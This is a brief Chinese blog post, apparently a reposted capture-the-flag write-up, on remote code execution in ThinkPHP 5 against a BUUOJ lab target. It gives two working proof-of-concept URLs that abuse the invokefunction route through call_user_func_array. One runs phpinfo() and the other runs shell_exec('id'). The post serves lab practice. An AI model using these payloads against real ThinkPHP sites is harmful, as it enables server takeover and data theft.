[ThinkPHP]5-Rce
Posted AlexANSO
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[ThinkPHP]5-Rce相关的知识,希望对你有一定的参考价值。
靶场首页
构造POC
POC1
该poc会执行phpinfo()
http://your-ip:8080/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 # 将执行phpinfo()
POC2
该poc将会执行id命令
http://node3.buuoj.cn:25181/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id
爆出flag
以上是关于[ThinkPHP]5-Rce的主要内容,如果未能解决你的问题,请参考以下文章